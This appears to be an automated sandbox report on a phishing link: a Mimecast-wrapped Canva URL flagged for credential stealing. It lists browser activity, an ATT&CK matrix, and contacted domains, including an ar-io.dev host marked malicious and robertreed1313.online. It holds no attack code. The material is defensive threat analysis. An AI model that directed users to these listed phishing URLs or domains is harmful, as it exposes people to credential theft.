Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.12:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.12:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.12:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.12:49930 version: TLS 1.2
Source: classification engineClassification label: mal60.phis.win@20/230@97/30
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2480,i,5302738435482969392,3902494254150986920,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4272 --field-trial-handle=2480,i,5302738435482969392,3902494254150986920,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2480,i,5302738435482969392,3902494254150986920,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com"Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4272 --field-trial-handle=2480,i,5302738435482969392,3902494254150986920,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com0%Avira URL Cloudsafe
https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.canva-staging.com/design/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
static.cloudflareinsights.com
104.16.79.73
truefalse
    high
    p.tvpixel.com
    99.83.205.94
    truefalse
      high
      www.canva.com
      104.16.102.112
      truefalse
        high
        adservice.google.com
        172.217.17.34
        truefalse
          high
          spdc-global.pbp.gysm.yahoodns.net
          54.171.122.26
          truefalse
            high
            d1w725hft9421a.cloudfront.net
            18.161.111.33
            truefalse
              high
              ct.canva.com
              216.239.36.21
              truefalse
                high
                code.jquery.com
                151.101.194.137
                truefalse
                  high
                  static.canva.com
                  104.16.103.112
                  truefalse
                    high
                    media.canva.com
                    104.16.103.112
                    truefalse
                      high
                      cdnjs.cloudflare.com
                      104.17.24.14
                      truefalse
                        high
                        font-public.canva.com
                        104.16.103.112
                        truefalse
                          high
                          www.google.com
                          142.250.181.68
                          truefalse
                            high
                            a.nel.cloudflare.com
                            35.190.80.1
                            truefalse
                              high
                              o13855.ingest.sentry.io
                              34.120.195.249
                              truefalse
                                high
                                cos.na-ashburn.myqcloud.com
                                49.51.77.119
                                truefalse
                                  high
                                  ad.doubleclick.net
                                  172.217.17.70
                                  truefalse
                                    high
                                    chunk-composing.canva.com
                                    104.16.102.112
                                    truefalse
                                      high
                                      6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev
                                      65.9.112.3
                                      truetrue
                                        unknown
                                        maxcdn.bootstrapcdn.com
                                        104.18.10.207
                                        truefalse
                                          high
                                          robertreed1313.online
                                          162.241.71.126
                                          truefalse
                                            unknown
                                            url.us.m.mimecastprotect.com
                                            205.139.111.12
                                            truefalse
                                              high
                                              telemetry.canva.com
                                              104.16.102.112
                                              truefalse
                                                high
                                                googleads.g.doubleclick.net
                                                172.217.17.66
                                                truefalse
                                                  high
                                                  sb.scorecardresearch.com
                                                  18.165.220.106
                                                  truefalse
                                                    high
                                                    api.ipify.org
                                                    104.26.12.205
                                                    truefalse
                                                      high
                                                      sp.analytics.yahoo.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        robertreed1313-1323985617.cos.na-ashburn.myqcloud.com
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          use.fontawesome.com
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            cdn.metadata.io
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              NameMaliciousAntivirus DetectionReputation
                                                              https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015false
                                                                high
                                                                https://static.canva.com/web/images/aba10b640f15bb01b8e5f0b804eefc7f.svgfalse
                                                                  high
                                                                  https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                                                    high
                                                                    https://static.canva.com/web/777de1c5173d2119.ltr.cssfalse
                                                                      high
                                                                      https://www.canva.com/_ajax/csrf3/designinsightfalse
                                                                        high
                                                                        https://chunk-composing.canva.com/chunk-batch/images/b46630e470f4040eba7033cf2435edce.wofffalse
                                                                          high
                                                                          https://static.canva.com/web/images/3a05dbf1cdd156fcd1677a0b444cc36f.svgfalse
                                                                            high
                                                                            https://static.canva.com/web/7aa7a229de4ac1cc.jsfalse
                                                                              high
                                                                              https://chunk-composing.canva.com/chunk-batch/5756a030498f80f0.js+b3bc71e281d55f78.jsfalse
                                                                                high
                                                                                https://static.canva.com/web/1790b19a3beefdca.ltr.cssfalse
                                                                                  high
                                                                                  https://static.canva.com/static/images/favicon-1.icofalse
                                                                                    high
                                                                                    https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.comfalse
                                                                                      high
                                                                                      https://static.canva.com/web/f2b916a20536621e.jsfalse
                                                                                        high
                                                                                        https://chunk-composing.canva.com/chunk-batch/3e1e05ba24ee6f70.js+6d0e69feb99e4a90.js+60f63b285a3b4847.js+b2bb61a849e48145.js+c8a97d58e80df6e6.js+b68cf68769865eb5.js+edabeea6215279ba.js+131eb4392c201a0d.js+217c7ff3fe127f37.js+c2b308fb492f8999.js+bd755f9837164721.js+896e1adda18e46a3.jsfalse
                                                                                          high
                                                                                          https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                                                                            high
                                                                                            https://static.canva.com/web/4af0e43f4ef393f1.vendor.jsfalse
                                                                                              high
                                                                                              https://www.canva.com/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                                                                                                high
                                                                                                https://static.canva.com/web/c40487ebdc5035af.jsfalse
                                                                                                  high
                                                                                                  https://static.canva.com/web/314d0852e94e7e23.ltr.cssfalse
                                                                                                    high
                                                                                                    https://www.canva.com/_ajax/ae/createBatchfalse
                                                                                                      high
                                                                                                      https://o13855.ingest.sentry.io/api/1767683/envelope/?sentry_key=944d224d45b943ba9f96396432dfd868&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.16.0false
                                                                                                        high
                                                                                                        https://static.canva.com/web/228115b6a6e5e8e3.ltr.cssfalse
                                                                                                          high
                                                                                                          https://www.canva.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/22755d9a86c9/main.js?false
                                                                                                            high
                                                                                                            https://sb.scorecardresearch.com/p2?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=2124162551false
                                                                                                              high
                                                                                                              https://static.canva.com/web/images/8777e8ed572c4159d71b08cca2972b15.svgfalse
                                                                                                                high
                                                                                                                https://static.canva.com/web/319bbcd1cecdb6ee.ltr.cssfalse
                                                                                                                  high
                                                                                                                  https://chunk-composing.canva.com/chunk-batch/0009a6e8ae11a411.ltr.css+b9997efbfcc9862a.ltr.css+4217645fff8006fa.ltr.css+44120d0e86f58fdd.ltr.css+70f83d7290d33057.ltr.cssfalse
                                                                                                                    high
                                                                                                                    https://sb.scorecardresearch.com/p?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=2124162551false
                                                                                                                      high
                                                                                                                      https://www.canva.com/_ajax/reaction/reactions/summaries?parentArtifactType=DOCUMENT&source=B&reactedObjectType=B&limit=100&documentId=DAGXBQfQ3AM&documentExtension=BvO9V97vV3Qk87FqBY6pdQfalse
                                                                                                                        high
                                                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                        https://font-public.canva.com/_fb/0/56.woff2)chromecache_150.2.drfalse
                                                                                                                          high
                                                                                                                          https://stats.g.doubleclick.net/g/collectchromecache_151.2.dr, chromecache_204.2.drfalse
                                                                                                                            high
                                                                                                                            https://font-public.canva.com/_fb/0/24.woff)chromecache_150.2.drfalse
                                                                                                                              high
                                                                                                                              https://www.redditstatic.com/ads/pixel.jschromecache_235.2.dr, chromecache_231.2.drfalse
                                                                                                                                high
                                                                                                                                https://www.canva-staging.com/design/chromecache_224.2.dr, chromecache_149.2.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://font-public.canva.com/_fb/0/17.woff2)chromecache_150.2.drfalse
                                                                                                                                  high
                                                                                                                                  https://font-public.canva.com/_fb/0/04.ttf)chromecache_150.2.drfalse
                                                                                                                                    high
                                                                                                                                    https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/chromecache_217.2.dr, chromecache_193.2.drfalse
                                                                                                                                      high
                                                                                                                                      https://font-public.canva.com/_fb/0/31.woff)chromecache_150.2.drfalse
                                                                                                                                        high
                                                                                                                                        https://font-public.canva.com/_fb/0/04.woff)chromecache_150.2.drfalse
                                                                                                                                          high
                                                                                                                                          https://font-public.canva.com/_fb/0/71.woff)chromecache_150.2.drfalse
                                                                                                                                            high
                                                                                                                                            https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabledchromecache_217.2.dr, chromecache_193.2.drfalse
                                                                                                                                              high
                                                                                                                                              https://font-public.canva.com/_fb/0/11.woff)chromecache_150.2.drfalse
                                                                                                                                                high
                                                                                                                                                https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespacechromecache_217.2.dr, chromecache_193.2.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://fontawesome.comchromecache_243.2.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://github.com/twbs/bootstrap/graphs/contributors)chromecache_272.2.dr, chromecache_258.2.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anonchromecache_217.2.dr, chromecache_193.2.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://font-public.canva.com/_fb/0/02.ttf)chromecache_150.2.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://bugzilla.mozilla.org/show_bug.cgi?id=687787chromecache_217.2.dr, chromecache_193.2.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://ad.doubleclick.net/activity;src=9812343;type=conve0;cat=canva008;ord=2037306899;gtm=45j91e4bchromecache_180.2.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://bugs.chromium.org/p/chromium/issues/detail?id=470258chromecache_217.2.dr, chromecache_193.2.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://font-public.canva.com/_fb/0/2E.ttf)chromecache_150.2.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://cdn.iframe.lychromecache_224.2.dr, chromecache_149.2.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://font-public.canva.com/_fb/0/76.ttf)chromecache_150.2.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://tally.so/chromecache_224.2.dr, chromecache_149.2.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://tally.so/chromecache_224.2.dr, chromecache_149.2.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://font-public.canva.com/_fb/0/16.woff)chromecache_150.2.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://vimeo.com/chromecache_224.2.dr, chromecache_149.2.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://font-public.canva.com/_fb/0/0B.woff2)chromecache_150.2.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://font-public.canva.com/_fb/0/61.woff2)chromecache_150.2.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://font-public.canva.com/_fb/0/28.woff2)chromecache_150.2.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://font-public.canva.com/_fb/0/72.woff)chromecache_150.2.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://font-public.canva.com/_fb/0/7E-quadratic.woff)chromecache_150.2.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://font-public.canva.com/_fb/0/31.ttf)chromecache_150.2.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://font-public.canva.com/_fb/0/24.woff2)chromecache_150.2.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://font-public.canva.com/_fb/0/56.woff)chromecache_150.2.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://jsperf.com/getall-vs-sizzle/2chromecache_217.2.dr, chromecache_193.2.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://font-public.canva.com/_fb/0/2D.woff2)chromecache_150.2.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://px.ads.linkedin.com/collect/?pid=chromecache_235.2.dr, chromecache_231.2.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://font-public.canva.com/_fb/0/4C.woff2)chromecache_150.2.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://font-public.canva.com/_fb/0/29.woff)chromecache_150.2.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://font-public.canva.com/_fb/0/47.woff2)chromecache_150.2.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://font-public.canva.com/_fb/0/7E.otf)chromecache_150.2.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://font-public.canva.com/_fb/0/6F.woff)chromecache_150.2.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=2chromecache_180.2.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://api-gw.metadata.iochromecache_155.2.dr, chromecache_251.2.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://font-public.canva.com/_fb/0/3D.ttf)chromecache_150.2.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://jquery.com/chromecache_217.2.dr, chromecache_193.2.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://font-public.canva.com/_fb/0/02.woff2)chromecache_150.2.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://font-public.canva.com/_fb/0/17.woff)chromecache_150.2.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://font-public.canva.com/_fb/0/60.ttf)chromecache_150.2.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://canva-embed.comchromecache_224.2.dr, chromecache_149.2.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://quilljs.com/chromecache_233.2.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://font-public.canva.com/_fb/0/47.ttf)chromecache_150.2.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_272.2.dr, chromecache_216.2.dr, chromecache_258.2.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://font-public.canva.com/_fb/0/28.ttf)chromecache_150.2.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://font-public.canva.com/_fb/0/2E.woff)chromecache_150.2.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://sizzlejs.com/chromecache_217.2.dr, chromecache_193.2.drfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://font-public.canva.com/_fb/0/05.woff)chromecache_150.2.drfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://font-public.canva.com/_fb/0/39.woff2)chromecache_150.2.drfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://font-public.canva.com/_fb/0/09.ttf)chromecache_150.2.drfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://font-public.canva.com/_fb/0/6F.ttf)chromecache_150.2.drfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://chunk-composing.canva.com/chunk-batch-sm/85_sourcemaps/3e1e05ba24ee6f70.js.mapchromecache_260.2.dr, chromecache_244.2.drfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    http://youtu.be/chromecache_224.2.dr, chromecache_149.2.drfalse
                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                      https://font-public.canva.com/_fb/0/70.woff2)chromecache_150.2.drfalse
                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                        https://bugs.jquery.com/ticket/12359chromecache_217.2.dr, chromecache_193.2.drfalse
                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                          https://font-public.canva.com/_fb/0/26.ttf)chromecache_150.2.drfalse
                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                            https://font-public.canva.com/_fb/0/75.woff2)chromecache_150.2.drfalse
                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                              https://www.canva.com/help/get-in-touch/contact-supportchromecache_232.2.dr, chromecache_254.2.drfalse
                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                https://font-public.canva.com/_fb/0/76.woff2)chromecache_150.2.drfalse
                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                  https://chunk-composing.canva.com/chunk-batch-sm/2_sourcemaps/9791fb4bf6628247.ltr.css.mapchromecache_233.2.drfalse
                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                    104.18.10.207
                                                                                                                                                                                                                                                                    maxcdn.bootstrapcdn.comUnited States
                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                    18.165.220.106
                                                                                                                                                                                                                                                                    sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                                                    3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                    172.217.17.66
                                                                                                                                                                                                                                                                    googleads.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                    18.161.111.63
                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                    3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                    18.165.220.66
                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                    3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                    104.16.102.112
                                                                                                                                                                                                                                                                    www.canva.comUnited States
                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                    216.239.36.21
                                                                                                                                                                                                                                                                    ct.canva.comUnited States
                                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                    142.250.181.68
                                                                                                                                                                                                                                                                    www.google.comUnited States
                                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                    99.83.205.94
                                                                                                                                                                                                                                                                    p.tvpixel.comUnited States
                                                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                    65.9.112.3
                                                                                                                                                                                                                                                                    6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.devUnited States
                                                                                                                                                                                                                                                                    16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                    35.190.80.1
                                                                                                                                                                                                                                                                    a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                    151.101.194.137
                                                                                                                                                                                                                                                                    code.jquery.comUnited States
                                                                                                                                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                                                                                                                                    172.217.21.36
                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                    104.16.79.73
                                                                                                                                                                                                                                                                    static.cloudflareinsights.comUnited States
                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                    104.26.13.205
                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                    162.241.71.126
                                                                                                                                                                                                                                                                    robertreed1313.onlineUnited States
